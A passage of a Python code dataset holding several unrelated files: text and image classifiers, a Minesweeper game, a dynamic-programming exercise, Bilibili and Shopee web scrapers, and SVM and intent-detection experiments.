word_tokenize(fichier)\n for mot in words:\n if mot not in stop_words:\n \n preprocess.append(mot)\n str_preprocess = ' '.join(preprocess)# Pour retourner sur une phrase et non une liste\n list_preprocess.append(str_preprocess)\n list_fichiers=list_preprocess\n \n else:\n print(\"Nombre de chemins : \", len(chemin_txt))\n for chemin in chemin_txt:\n with open(\"Tobacco3482-OCR/\"+chemin, 'r') as fichier:\n list_fichiers.append(fichier.read().replace('\\n', ''))\n print(\"doc recup (3482) : \", len(list_fichiers))\n \n #Conversion sous format df\n for i, content in enumerate(list_fichiers): \n df.loc[i, 'img_path'] = content\n\n\n return df\n\ndef split_dataset(X,y):\n\n X_train, X_test, y_train, y_test = train_test_split( X, y, test_size=0.33, random_state=42)\n\n \n return X_train, X_test, y_train, y_test\n\ndef vectorize(X_train, X_test):\n vectorizer = CountVectorizer(max_features=3000)\n vectorizer.fit(X_train)\n X_train_counts = vectorizer.transform(X_train)\n X_test_counts = vectorizer.transform(X_test)\n \n return X_train_counts, X_test_counts\n\n\n\n \netude_des_classes(path_csv)\n\n\n#Import des fichiers\ndf_fichiers = recup_fichier(path_csv,stopmot=False)\n#print(\"\\nAffichage d'un fichier aléatoire : \\n\\n\", list_fichiers[int(np.random.rand(1) * len(list_fichiers))])\nX_train, X_test, y_train, y_test = split_dataset(X=df_fichiers.img_path,y=df_fichiers.label)\nX_train_counts, X_test_counts = vectorize(X_train, X_test)\n\n# Naives Bayes\n\nprint(\"\\n NAIVES BAYES \\n\")\nclf = MultinomialNB()\nclf.fit(X_train_counts, y_train)\n\nprint(\"vectorize Naive Bayes Score durant la phase de test : \", clf.score(X_test_counts,y_test))\nprint(\"vectorize Naive Bayes Score durant la phase d'entrainement : \", clf.score(X_train_counts,y_train))\n\ny_pred_test = clf.predict(X_test_counts)\nprint(classification_report(y_test, y_pred_test))\nprint(confusion_matrix(y_test, y_pred_test))\n\n#TF-IDF REPRESENTATION\n\nprint(\"\\n TF-IDF REPRESENTATION \\n\")\ntf_transformer = TfidfTransformer().fit(X_train_counts)\nX_train_Tfid = tf_transformer.transform(X_train_counts)\nX_test_Tfid = tf_transformer.transform(X_test_counts)\n\n\nclf = MultinomialNB()\nclf.fit(X_train_Tfid, y_train)\n\nprint(\"TF-IDF Naives Bayes Score durant la phase de test : \", clf.score(X_test_Tfid,y_test))\nprint(\"TF-IDF Naives Bayes Score durant la phase d'entrainement : \", 
clf.score(X_train_Tfid,y_train))\nprint(X_test_Tfid.shape)\ny_pred_test = clf.predict(X_test_Tfid)\n\nprint(\"Classe non prédit(s) avec TF-IDF Naive Bayes: \", set(y_test)-set(y_pred_test))\nprint(classification_report(y_test, y_pred_test))\n\nprint(confusion_matrix(y_test, y_pred_test))\n\n# Random forest with vectorize frequency representation\n\n#!!!!! La phase de test des Hyperparamètres est sur le Notebook !!!!!\n\nprint(\"\\n Random Forest \\n\")\n\nclf_rf = RandomForestClassifier(n_estimators=800, min_samples_split = 6, max_features = 10)\n\nclf_rf.fit(X_train_counts, y_train)\n\ny_pred_test = clf_rf.predict(X_test_counts)\n\nprint(classification_report(y_test, y_pred_test))\nprint(confusion_matrix(y_test, y_pred_test))\n\n","sub_path":"tobacco_projet.py","file_name":"tobacco_projet.py","file_ext":"py","file_size_in_byte":5069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"451691778","text":"# circleSketcher.py\n# Lab 3\n# Allow a user to draw a circle and then set the fill color of that circle\n# by: Sam Clemente\n# 9/25/2020\n\nfrom graphics import *\nfrom math import *\n\ndef main():\n \n # Circle Sketcher window is created\n # with reset coordinates for ease of programming\n win = GraphWin(\"Circle Sketcher 0.5\", 640,640)\n win.setCoords(0.0, 0.0, 10.0, 10.0)\n\n # Initial message in Circle Sketcher\n message = Text(Point(5.0, 5.0), \"Click to set your circle's center\")\n message.draw(win)\n\n # Stores point for center of circle\n center = win.getMouse()\n centerPoint = Point(center.getX(), center.getY()).draw(win)\n\n # Changing message\n message.setText(\"Click again to define the radius of your circle\")\n\n # Getting radius point\n edge = win.getMouse()\n\n # Using distance formula to find the radius\n radius = sqrt((center.getX() - edge.getX())**2 +\n (center.getY() - edge.getY())**2)\n\n # Drawing circle\n circle1 = Circle(centerPoint, radius).draw(win)\n\n # Changing message\n message.setText(\"Click again to color the circle red\")\n\n # Setting circle color after click\n win.getMouse()\n circle1.setFill(\"red\")\n\n # Exit prompt\n message.setText(\"Click again to close\")\n win.getMouse()\n win.close()\n \nmain()\n\n","sub_path":"circleSketcher.py","file_name":"circleSketcher.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"234837425","text":"from enum import Enum\r\nimport random\r\n\r\nclass CellStatus(Enum):\r\n EXPOSED = 1\r\n UNEXPOSED = 2\r\n SEALED = 3\r\n\r\nclass GameStatus(Enum):\r\n INPROGRESS = 1\r\n WON = 2\r\n LOST = 3\r\n\r\nMAX_BOUNDS = 10\r\n\r\nclass Minesweeper:\r\n\r\n def __init__(self):\r\n self.flag = False\r\n\r\n self.cells = [[CellStatus.UNEXPOSED\r\n for i in range(MAX_BOUNDS)] for j in range(MAX_BOUNDS)]\r\n\r\n self.CellType = [[False\r\n for i in range(MAX_BOUNDS)] for j in range(MAX_BOUNDS)]\r\n\r\n self.minedCell = []\r\n\r\n def expose_cell(self, row, col):\r\n self.check_bounds(row, col)\r\n\r\n if self.cells[row][col] == CellStatus.UNEXPOSED:\r\n self.cells[row][col] = CellStatus.EXPOSED\r\n if self.adjacent_mine_count_at(row, col) == 0:\r\n self.expose_neighbors(row, col)\r\n\r\n def expose_neighbors(self, i, j):\r\n neighbors = [[i, j+1], [i+1, j], [i+1, j+1], [i, j-1], [i+1, j-1], [i-1, j], [i-1, j+1], [i-1, j-1]]\r\n for cell in neighbors:\r\n if 0 <= cell[0] <= MAX_BOUNDS - 1 and 0 <= cell[1] <= MAX_BOUNDS - 1:\r\n self.expose_cell(cell[0],cell[1])\r\n\r\n def 
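# The tobacco classifier above wires CountVectorizer, TfidfTransformer, and
# MultinomialNB together by hand. A sketch of the same three stages chained with
# scikit-learn's Pipeline; the toy documents and labels below are placeholders
# standing in for the Tobacco3482 OCR text.
from sklearn.pipeline import Pipeline
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.naive_bayes import MultinomialNB

# One estimator holds all three stages, so the fit/transform bookkeeping
# (fit on train only, transform everywhere) cannot get out of sync.
text_clf = Pipeline([
    ('counts', CountVectorizer(max_features=3000)),
    ('tfidf', TfidfTransformer()),
    ('nb', MultinomialNB()),
])

X = ['tobacco advertisement text', 'internal memo about budgets', 'report on smoke exposure']
y = ['Advertisement', 'Memo', 'Report']
text_clf.fit(X, y)
print(text_clf.predict(['memo about the advertisement budget']))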
toggle_seal(self, row, col):\r\n self.check_bounds(row, col)\r\n\r\n if self.cells[row][col] == CellStatus.EXPOSED:\r\n return\r\n\r\n if self.cells[row][col] == CellStatus.SEALED:\r\n self.cells[row][col] = CellStatus.UNEXPOSED\r\n else:\r\n self.cells[row][col] = CellStatus.SEALED\r\n\r\n def get_cell_state(self, row, col):\r\n return self.cells[row][col]\r\n\r\n def check_bounds(self, row, column):\r\n if row not in range(0, MAX_BOUNDS) or column not in range(0, MAX_BOUNDS):\r\n raise IndexError\r\n\r\n def set_mine(self, row, col):\r\n self.CellType[row][col] = True\r\n self.minedCell.append([row,col])\r\n\r\n def is_mine_at(self, row, col):\r\n if 0 <= row <= 10 - 1 and 0 <= col <= 10 - 1:\r\n return self.CellType[row][col]\r\n else:\r\n return False\r\n\r\n def adjacent_mine_count_at(self, i, j):\r\n neighbors = [[i, j + 1], [i + 1, j], [i + 1, j + 1], [i, j - 1], [i + 1, j - 1], [i - 1, j], [i - 1, j + 1], [i - 1, j - 1]]\r\n counter = 0\r\n for cell in neighbors:\r\n if self.is_mine_at(cell[0], cell[1]) is True:\r\n counter += 1\r\n return counter\r\n\r\n def get_game_status(self):\r\n for i in range(len(self.minedCell)):\r\n if self.get_cell_state(self.minedCell[i][0], self.minedCell[i][1]) == CellStatus.EXPOSED:\r\n return GameStatus.LOST\r\n\r\n for i in range(MAX_BOUNDS):\r\n for j in range(MAX_BOUNDS):\r\n if (i, j) not in self.minedCell and self.get_cell_state(i, j) == CellStatus.UNEXPOSED:\r\n return GameStatus.INPROGRESS\r\n\r\n for i in range(len(self.minedCell)):\r\n if self.get_cell_state(self.minedCell[i][0], self.minedCell[i][1]) != CellStatus.SEALED:\r\n return GameStatus.INPROGRESS\r\n\r\n return GameStatus.WON\r\n\r\n def randomize(self,seed):\r\n random.seed(seed)\r\n k = list()\r\n tempList = list()\r\n\r\n while len(tempList) != 10:\r\n i = random.randint(0, MAX_BOUNDS - 1)\r\n j = random.randint(0, MAX_BOUNDS - 1)\r\n k.append([i, j])\r\n for sublist in k:\r\n if sublist not in tempList:\r\n tempList.append(sublist)\r\n\r\n self.minedCell = tempList\r\n\r\n for i in range(len(self.minedCell)):\r\n self.CellType[self.minedCell[i][0]][self.minedCell[i][1]] = True\r\n","sub_path":"Minesweeper.py","file_name":"Minesweeper.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"548465736","text":"import sys\n\nsys.stdin = open(\"input.txt\",\"r\")\n\nN = int(sys.stdin.readline().rstrip())\n\nstore = [[0 for j in range(10)] for i in range(N+1)]\n\nfor j in range(1,10):\n store[1][j] = 1\n\ndef make(n):\n\n for j in range(10):\n if j ==9:\n cur = store[n - 1][j - 1] % 1000000000\n elif j == 0:\n cur = store[n-1][j+1] % 1000000000\n else:\n cur = store[n - 1][j - 1]%1000000000 + store[n - 1][j + 1]%1000000000\n\n store[n][j] = cur\n\nfor n in range(2,N+1):\n make(n)\nans = 0\nfor i in range(10):\n ans = (ans + store[N][i]) % 1000000000\n\nprint(ans)","sub_path":"쉬운 계단 수.py","file_name":"쉬운 계단 수.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"105946496","text":"#!/usr/bin/python\n# # -*- coding: UTF-8 -*-\nfrom tensorflow.keras.preprocessing import image\nimport numpy as np\nimport cv2\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.applications.mobilenet import MobileNet\nfrom tensorflow.keras.applications.mobilenet import preprocess_input, decode_predictions\n\n\n#include_top=True,完整的模型\n#include_top=False,去掉最后的3个全连接层,用来做fine-tuning专用,专门开源了这类模型。 \nmodel = 
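# The staircase-number DP above counts N-digit numbers whose adjacent digits differ
# by exactly 1, modulo 1e9. For small N the recurrence can be cross-checked against
# brute-force enumeration; a sketch:
def stair_count_dp(n, mod=1000000000):
    # dp[j] = number of valid i-digit numbers ending in digit j;
    # one-digit numbers cannot start with 0, matching the code above.
    dp = [0] + [1] * 9
    for _ in range(n - 1):
        dp = [((dp[j - 1] if j > 0 else 0) + (dp[j + 1] if j < 9 else 0)) % mod
              for j in range(10)]
    return sum(dp) % mod

def stair_count_brute(n):
    # Direct enumeration; only feasible for small n.
    return sum(1 for x in range(10 ** (n - 1), 10 ** n)
               if all(abs(int(a) - int(b)) == 1 for a, b in zip(str(x), str(x)[1:])))

assert all(stair_count_dp(n) == stair_count_brute(n) for n in range(1, 6))
print([stair_count_dp(n) for n in range(1, 6)])  # [9, 17, 32, 61, 116]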
MobileNet(weights='imagenet')\nprint(model.summary())\n\n\n\nimg_path = \"elephant.jpg\"\nimg = image.load_img(img_path, target_size=(224, 224))\n#将输入数据转换为0~1之间\nimg = image.img_to_array(img) / 255.0\n# 为batch添加第四维,axis=0表示在0位置添加,因为MobileNet的Iput层结构是(None,224,224,3)\nimg = np.expand_dims(img, axis=0)\nprint(img.shape)\n\npredictions = model.predict(img)\nprint('Predicted:', decode_predictions(predictions, top=3)[0])\nprint(predictions)\n\ndescription = decode_predictions(predictions, top=3)[0][0][1]\n\nsrc = cv2.imread(img_path)\ncv2.putText(src, description, (50,50), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255,0,0), 2)\ncv2.imshow(\"Predicted\", src)\ncv2.waitKey()\n\n\n","sub_path":"mobilenet预测.py","file_name":"mobilenet预测.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"133106744","text":"# -*- coding: utf-8 -*-\n\nimport scrapy\nfrom scrapy import Request\nfrom spider_execute.items import SpiderFansItem\n\nimport json\nimport time\nimport traceback\n\nclass BilibiliSpider(scrapy.Spider):\n \"\"\"bilibili爬虫\"\"\"\n name = \"fans\"\n # 4千万用户id\n start_urls = range(1, 400000000)\n url = 'https://api.bilibili.com/x/relation/followers?vmid=%s&pn=%s&ps=50&order=desc&jsonp=jsonp'\n # 复写settings\n custom_settings = {\n 'AUTOTHROTTLE_ENABLED': False\n }\n # 复写head\n head = {\n 'Host': 'api.bilibili.com'\n }\n\n def start_requests(self):\n '''初始化请求资源'''\n\n for mid in self.start_urls:\n self.mid = mid\n self.page = 1\n yield Request(\n url=self.url % (self.mid, self.page),\n headers=self.head,\n callback=self.parse\n )\n\n\n def parse(self, response):\n \"\"\"结果集\"\"\"\n try:\n # 获取items\n data = json.loads(response.body_as_unicode())\n for jsData in data['data']['list']:\n item_dict = SpiderFansItem()\n item_dict['source'] = 'fans'\n item_dict['mid'] = self.mid\n item_dict['fmid'] = jsData['mid']\n item_dict['mtime'] = jsData['mtime']\n item_dict['uname'] = jsData['uname']\n item_dict['official_verify_type'] = jsData['official_verify']['type']\n item_dict['official_verify_desc'] = jsData['official_verify']['desc']\n item_dict['sign'] = jsData['sign']\n item_dict['insert_time'] = int(time.time())\n # 递归\n if len(data['data']) == 50 and self.page < 5:\n self.page += 1\n yield Request(\n url=self.url % (self.mid, self.page),\n headers=self.head,\n callback=self.parse\n )\n # 入库\n else:\n yield item_dict\n\n except:\n print (traceback.format_exc())\n\n\n","sub_path":"spider_execute/spider_execute/spiders/fans.py","file_name":"fans.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"335924504","text":"# Preprocessing\nimport os\nimport pickle\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import LabelEncoder\nfrom keras.utils import to_categorical\nfrom utils import *\nfrom models import HCNN, Metrics_HCNN\nimport sys\n\n# Evaluation\nfrom keras import backend as K\nfrom keras.models import load_model, Model\nfrom sklearn.metrics import f1_score, precision_score, recall_score, accuracy_score\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.neighbors import LocalOutlierFactor\nfrom sklearn.svm import OneClassSVM\nimport pymysql.cursors\nfrom tqdm import tqdm\n\ndataset = 'SwDA'\nproportion = int(sys.argv[1])\n\nlogger = create_logger('HCNN_w3')\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0,1,2,3\"\nif proportion==25:\n gpu_id = \"0\"\nelif proportion==50:\n gpu_id = \"2\"\nelif 
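# The MobileNet script above imports preprocess_input but then rescales pixels by
# dividing by 255. For MobileNet's published ImageNet weights, preprocess_input maps
# pixel values to roughly [-1, 1] rather than [0, 1]; a small sketch of the imported
# helper on a random batch:
import numpy as np
from tensorflow.keras.applications.mobilenet import preprocess_input

batch = np.random.randint(0, 256, size=(1, 224, 224, 3)).astype('float32')
scaled = preprocess_input(batch.copy())  # copy: the helper may modify in place
print(scaled.min(), scaled.max())  # approximately -1.0 and 1.0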
proportion==75:\n gpu_id = \"3\"\nset_allow_growth(gpu_id)\n\n\n# Un-serialize\nwith open('data/df.pickle', 'rb') as handle:\n df = pickle.load(handle)\nwith open('data/word_index.pickle', 'rb') as handle:\n word_index = pickle.load(handle)\n\nwith open('data/X_train_0.pickle', 'rb') as handle:\n X_train = pickle.load(handle)\nwith open('data/X_valid_0.pickle', 'rb') as handle:\n X_valid = pickle.load(handle)\nwith open('data/X_test_0.pickle', 'rb') as handle:\n X_test = pickle.load(handle)\n \nwith open('data/X_train_-1.pickle', 'rb') as handle:\n X_train_n1 = pickle.load(handle)\nwith open('data/X_valid_-1.pickle', 'rb') as handle:\n X_valid_n1 = pickle.load(handle)\nwith open('data/X_test_-1.pickle', 'rb') as handle:\n X_test_n1 = pickle.load(handle)\n\nwith open('data/X_train_1.pickle', 'rb') as handle:\n X_train_p1 = pickle.load(handle)\nwith open('data/X_valid_1.pickle', 'rb') as handle:\n X_valid_p1 = pickle.load(handle)\nwith open('data/X_test_1.pickle', 'rb') as handle:\n X_test_p1 = pickle.load(handle)\n \nwith open('data/X_train_2.pickle', 'rb') as handle:\n X_train_p2 = pickle.load(handle)\nwith open('data/X_valid_2.pickle', 'rb') as handle:\n X_valid_p2 = pickle.load(handle)\nwith open('data/X_test_2.pickle', 'rb') as handle:\n X_test_p2 = pickle.load(handle)\n \nwith open('data/X_train_-2.pickle', 'rb') as handle:\n X_train_n2 = pickle.load(handle)\nwith open('data/X_valid_-2.pickle', 'rb') as handle:\n X_valid_n2 = pickle.load(handle)\nwith open('data/X_test_-2.pickle', 'rb') as handle:\n X_test_n2 = pickle.load(handle)\n\nwith open('data/y_train.pickle', 'rb') as handle:\n y_train = pickle.load(handle)\nwith open('data/y_valid.pickle', 'rb') as handle:\n y_valid = pickle.load(handle)\nwith open('data/y_test.pickle', 'rb') as handle:\n y_test = pickle.load(handle)\n\nspeaker_change_train = np.load('data/speaker_change_train_3.npy')\nspeaker_change_valid = np.load('data/speaker_change_valid_3.npy')\nspeaker_change_test = np.load('data/speaker_change_test_3.npy')\n\nn_class = y_train.unique().shape[0]\nn_class_seen = int(n_class * proportion/100)\n\nfor number in range(10):\n with open('data/y_cols_' + dataset + \"_\" + str(proportion) + '_' + str(number) + '.pickle', 'rb') as handle:\n d = pickle.load(handle)\n\n y_cols_seen = d['y_cols_seen'] \n y_cols_unseen = d['y_cols_unseen']\n print(y_cols_seen)\n\n train_seen_idx = y_train[y_train.isin(y_cols_seen)].index\n valid_seen_idx = y_valid[y_valid.isin(y_cols_seen)].index\n\n X_train_seen = X_train[train_seen_idx]\n X_train_n1_seen = X_train_n1[train_seen_idx]\n X_train_p1_seen = X_train_p1[train_seen_idx]\n X_train_n2_seen = X_train_n2[train_seen_idx]\n X_train_p2_seen = X_train_p2[train_seen_idx]\n y_train_seen = y_train[train_seen_idx]\n\n X_valid_seen = X_valid[valid_seen_idx]\n X_valid_n1_seen = X_valid_n1[valid_seen_idx]\n X_valid_p1_seen = X_valid_p1[valid_seen_idx]\n X_valid_n2_seen = X_valid_n2[valid_seen_idx]\n X_valid_p2_seen = X_valid_p2[valid_seen_idx]\n y_valid_seen = y_valid[valid_seen_idx]\n\n speaker_change_train_seen = speaker_change_train[train_seen_idx]\n speaker_change_valid_seen = speaker_change_valid[valid_seen_idx]\n\n le = LabelEncoder()\n le.fit(y_train_seen)\n y_train_idx = le.transform(y_train_seen)\n y_train_onehot = to_categorical(y_train_idx)\n y_valid_idx = le.transform(y_valid_seen)\n y_valid_onehot = to_categorical(y_valid_idx)\n y_test_mask = y_test.copy()\n y_test_mask[y_test_mask.isin(y_cols_unseen)] = 'unseen'\n\n metrics_earlystop = Metrics_HCNN(logger)\n\n targets_train = 
np.expand_dims(np.tile([0,0,1,0,0], (X_train_seen.shape[0],1)), axis=2)\n targets_valid = np.expand_dims(np.tile([0,0,1,0,0], (X_valid_seen.shape[0],1)), axis=2)\n targets_test = np.expand_dims(np.tile([0,0,1,0,0], (X_test.shape[0],1)), axis=2)\n\n train_data = ([X_train_seen, X_train_n1_seen, X_train_p1_seen, X_train_n2_seen, X_train_p2_seen, speaker_change_train_seen, targets_train], y_train_onehot)\n valid_data = ([X_valid_seen, X_valid_n1_seen, X_valid_p1_seen, X_valid_n2_seen, X_valid_p2_seen, speaker_change_valid_seen, targets_valid], y_valid_onehot)\n test_data = ([X_test, X_test_n1, X_test_p1, X_test_n2, X_test_p2, speaker_change_test, targets_test], y_test_mask)\n \n # Load model\n model = load_model('data/HCNN-DOC_w3_' + str(proportion) + '_' + str(number) + '.h5')\n y_pred_proba = model.predict(test_data[0])\n y_pred_proba_train = model.predict(train_data[0])\n classes = list(le.classes_) + ['unseen']\n\n d_result = {\n 'all': defaultdict(dict),\n 'seen': defaultdict(dict),\n 'unseen': defaultdict(dict),\n }\n \n \n \n method = \"2DOC\"\n df_seen = pd.DataFrame(y_pred_proba, columns=le.classes_)\n df_seen_train = pd.DataFrame(y_pred_proba_train, columns=le.classes_)\n df_seen_train['y_true'] = y_train_seen.values\n col_to_threshold = {}\n alpha = 2\n for col in y_cols_seen:\n tmp = df_seen_train[df_seen_train['y_true']==col][[col, 'y_true']]\n tmp = np.hstack([tmp[col], 2-tmp[col]])\n threshold = 1 - alpha*tmp.std()\n col_to_threshold[col] = threshold\n col_to_threshold = {k: max([0.5, v])for k, v in col_to_threshold.items()}\n masks = [df_seen[col]= min_len_str:\n result.append(\n {\n 'itemid': itemid,\n 'shopid': shopid,\n 'userid': userid,\n 'cmtid': cmtid,\n 'mtime': mtime,\n 'rating_star': rating_star,\n 'comment': comment\n })\n return result\n\n\ndef get_products_from_json(json_data, get_top_product=False):\n data = json_data['data']\n sections = data['sections'] if data != None else []\n result = []\n for s in sections:\n data = s['data']\n item = data['item']\n if item != None:\n for i in item:\n shopid = i['shopid']\n itemid = i['itemid']\n result.append(\n {\n 'shopid': shopid,\n 'itemid': itemid\n })\n if get_top_product:\n top_product = data['top_product']\n if top_product != None:\n for t in top_product:\n list = t['list']\n data = list['data']\n item_lite = data['item_lite']\n if item_lite != None:\n for i in item_lite:\n shopid = i['shopid']\n itemid = i['itemid']\n result.append(\n {\n 'shopid': shopid,\n 'itemid': itemid\n })\n return result\n\n\ndef get_all_ratings(itemid, shopid, limit=6, offset=0, min_len_cmt=4, type=0):\n result = []\n while True:\n json_data = get_json_product(itemid, limit, offset, shopid, type)\n ratings = get_ratings_from_json(json_data, min_len_cmt)\n if ratings == []:\n break\n else:\n result += ratings\n offset += limit\n return result\n\n\ndef get_all_recommended_products(max_products=100, limit=10, offset=0, get_top_product=False):\n result = []\n if max_products < limit:\n limit = max_products\n while True:\n start_time = time.time()\n # Notes: The number of products may be smaller than limit number although max_products < limit\n # So the number of result can be larger than the max_products\n json_data = get_json_recommend(limit, offset)\n products = get_products_from_json(json_data, get_top_product)\n if products == [] or len(result) >= max_products:\n break\n else:\n result += products\n print('Đã lấy về {} sản phẩm trên tổng số tối đa {} sản phẩm. 
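# The col_to_threshold loop above implements a DOC-style per-class rejection cutoff:
# in-class probabilities are mirrored around 1 to form a full Gaussian, and the
# threshold is set to 1 - alpha * sigma with a floor of 0.5. A standalone numpy
# sketch of that calculation on synthetic probabilities:
import numpy as np

def doc_threshold(probs, alpha=2.0):
    # Mirror around 1 so the one-sided distribution of in-class probabilities
    # gets a symmetric counterpart, then cut at 1 - alpha * sigma, floored at 0.5.
    mirrored = np.hstack([probs, 2.0 - probs])
    return max(0.5, 1.0 - alpha * mirrored.std())

rng = np.random.default_rng(0)
in_class_probs = np.clip(rng.normal(0.97, 0.02, size=200), 0.0, 1.0)
# The threshold reflects both the spread and the distance of the mean from 1.
print(doc_threshold(in_class_probs))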
Mất {:0.2f} mili giây'.format(\n len(result), max_products, (time.time() - start_time)*1000))\n offset += limit\n return result\n\n\ndef get_all_campaign_products(label, max_products=100, limit=10, offset=0):\n result = []\n if max_products < limit:\n limit = max_products\n while True:\n start_time = time.time()\n # Notes: The number of products may be smaller than limit number although max_products < limit\n # So the number of result can be larger than the max_products\n json_data = get_json_campaign(label, limit, offset)\n products = get_products_from_json(json_data, False)\n if products == [] or len(result) >= max_products:\n break\n else:\n result += products\n print('Đã lấy về {} sản phẩm trên tổng số {} sản phẩm, tối đa {} sản phẩm. Mất {:0.2f} mili giây'.format(\n len(products), len(result), max_products, (time.time() - start_time)*1000))\n offset += limit\n return result\n\n\ndef export_to_text_file(array_of_json, filename, only_header=False):\n f = open(filename, 'a+', encoding='utf-8')\n if only_header:\n f.write('userid\\tcmtid\\tmtime\\trating_star\\tcomment\\n')\n else:\n for j in array_of_json:\n f.write('{}\\t{}\\t{}\\t{}\\t{}\\n'.format(\n j['userid'], j['cmtid'], j['mtime'], j['rating_star'], j['comment']))\n f.close()\n\n\ndef collect_reviews_product(filename, max_products, min_len_cmt=4, types=[0]):\n '''Collect all reviews of products with specific rating_star\n * type = array [0]: get all rating_stars\n * type = array [1..5]: get only these rating_stars\n '''\n products = get_all_recommended_products(\n max_products=max_products, get_top_product=True)\n # products = get_all_campaign_products(1005922, max_products)\n length_products = len(products)\n export_to_text_file(None, filename, True)\n for p in products:\n start_time = time.time()\n itemid = p['itemid']\n shopid = p['shopid']\n ratings = []\n if types != None and types != []:\n for t in types:\n ratings += get_all_ratings(\n itemid, shopid, min_len_cmt=min_len_cmt, type=t)\n else:\n ratings += get_all_ratings(itemid, shopid, min_len_cmt=min_len_cmt)\n export_to_text_file(ratings, filename)\n length_products -= 1\n print('Đã thu thập và ghi {} đánh giá của sản phẩm {} tại shop {}. Còn {} sản phẩm nữa. Mất {:0.2f} mili giây'.format(\n len(ratings), itemid, shopid, length_products, (time.time() - start_time)*1000))\n\n\ndef remove_duplicate_column(filename, col_check):\n df = pd.read_csv(filename, delimiter='\\t')\n print(df['rating_star'].value_counts().sort_index(ascending=True))\n df.drop_duplicates(col_check, inplace=True)\n print(df['rating_star'].value_counts().sort_index(ascending=True))\n df.to_csv(filename, sep='\\t', index=False)\n\n\ndef prune(filename):\n df = pd.read_csv(filename, delimiter='\\t')\n min = df.groupby('rating_star').agg('count')['comment'].min()\n for i in [1, 2, 3, 4, 5]:\n rows = df.loc[df['rating_star'] == i]\n rows = rows.sort_values(\n by='comment', key=lambda x: x.str.len(), ascending=False)\n rows = rows.head(min)\n header = True if i == 1 else False\n rows.to_csv('pruned_' + filename, mode='a',\n index=False, sep='\\t', header=header)\n\n\nif __name__ == '__main__':\n # collect_reviews_product('sentiments.txt', 100, types=[1, 2, 3, 4])\n remove_duplicate_column('sentiments_v5.txt', 'comment')\n","sub_path":"APIv1.py","file_name":"APIv1.py","file_ext":"py","file_size_in_byte":9387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"210301940","text":"'''\r\n This file is part of GFLIB toolbox\r\n First Version Sept. 
2018\r\n\r\n Cite this project as:\r\n Mezher M., Abbod M. (2011) Genetic Folding: A New Class of Evolutionary Algorithms.\r\n In: Bramer M., Petridis M., Hopgood A. (eds) Research and Development in Intelligent Systems XXVII.\r\n SGAI 2010. Springer, London\r\n\r\n Copyright (C) 20011-2018 Mohd A. Mezher (mohabedalgani@gmail.com)\r\n'''\r\n\r\nfrom warnings import filterwarnings\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport os\r\nimport glob\r\n\r\n# create folder for graphs generated during the run\r\nif not os.path.exists('images/'):\r\n os.makedirs('images/')\r\nelse:\r\n files = glob.glob('images/*')\r\n for f in files:\r\n os.remove(f)\r\n\r\nfrom inipop import inipop\r\nfrom genpop import genpop\r\nfrom tipicalsvm import typicalsvm\r\n\r\nfilterwarnings('ignore')\r\nprint('Running multi classification ...\\n\\n')\r\n\r\nprint('Type the maximum length of the chromosome: ')\r\nmax_chromosome_length = int(input()) # the maximum total length of the chromosome\r\n\r\nDATA_PATH = 'data/multi/' # Dataset path for binary classification\r\n\r\nparams = dict()\r\nparams['type'] = 'multi' # problem type\r\nparams['data'] = 'wine_scale.txt' # path to data file\r\nparams['kernel'] = 'rbf' # rbf,linear,polynomial,gf\r\nparams['mutProb'] = 0.1 # mutation probability\r\nparams['crossProb'] = 0.5 # crossover probability\r\nparams['maxGen'] = 5 # max generation\r\nparams['popSize'] = 10 # population size\r\nparams['crossVal'] = 5 # number of cross validation slits\r\nparams['opList'] = ['Plus_s', 'Minus_s', 'Plus_v', 'Minus_v',\r\n 'Sine', 'Cosine', 'Tanh', 'Log', 'x', 'y'] # Operators and operands\r\n\r\nprint(f'''Data Set : {DATA_PATH + params['data']}\\n\\n''')\r\nkernels = ['poly', 'rbf', 'linear', 'gf']\r\ntotalMSE = dict()\r\nfor ker in kernels:\r\n totalMSE[ker] = list()\r\n\r\nfor i in range(5):\r\n temp = []\r\n for index, kernel in enumerate(kernels):\r\n params['kernel'] = kernel\r\n print(f'''SVM Kernel : {params['kernel']} \\n''')\r\n if kernel == 'gf':\r\n print(f'''Max Generation : {params['maxGen']}\\n''')\r\n print(f'''Population Size : {params['popSize']}\\n''')\r\n print(f'''CrossOver Probability : {params['crossProb']}\\n''')\r\n print(f'''Mutation Probability : {params['mutProb']}\\n\\n''')\r\n pop = inipop(params, max_chromosome_length)\r\n mse = genpop(pop, params, i)\r\n else:\r\n mse = typicalsvm(params)\r\n totalMSE[kernel].append(mse)\r\n print('\\n')\r\n\r\n# Boxplot of errors for each kernel\r\nplt.boxplot([totalMSE['poly'], totalMSE['rbf'], totalMSE['linear'], totalMSE['gf']])\r\nplt.xticks(np.arange(1,5), kernels)\r\nplt.title('MSE for each svm kernel')\r\nplt.xlabel('SVM kernel')\r\nplt.ylabel('Test Error Rate')\r\nplt.ioff()\r\nplt.savefig('images/mse.png')\r\nplt.show()\r\n\r\n","sub_path":"multi.py","file_name":"multi.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"19717971","text":"'''\r\nModule to handle the generation of explorer tables from information supplied to \r\nthe CMIP5 questionnaire\r\n\r\n@author: gerard devine\r\n'''\r\n\r\nfrom cmip5q.explorer.dbvalues 